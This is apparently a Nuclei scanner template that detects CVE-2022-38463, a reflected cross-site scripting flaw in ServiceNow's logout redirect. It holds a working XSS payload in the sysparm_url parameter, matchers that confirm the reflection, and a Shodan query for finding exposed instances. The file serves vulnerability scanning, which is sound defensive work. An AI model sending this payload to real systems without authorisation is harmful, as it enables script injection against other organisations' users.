nuclei-templates/cves/2022/CVE-2022-38463.yaml

43 lines
1.2 KiB
YAML

id: CVE-2022-38463
info:
name: ServiceNow - Cross-Site Scripting
author: amanrawat
severity: medium
description: |
ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
- https://nvd.nist.gov/vuln/detail/CVE-2022-38463
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38463
cwe-id: CWE-79
metadata:
shodan-query: http.title:"ServiceNow"
verified: "true"
tags: cve,cve2022,servicenow,xss
requests:
- method: GET
path:
- "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "top.location.href = 'javascript:alert(document.domain)';"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14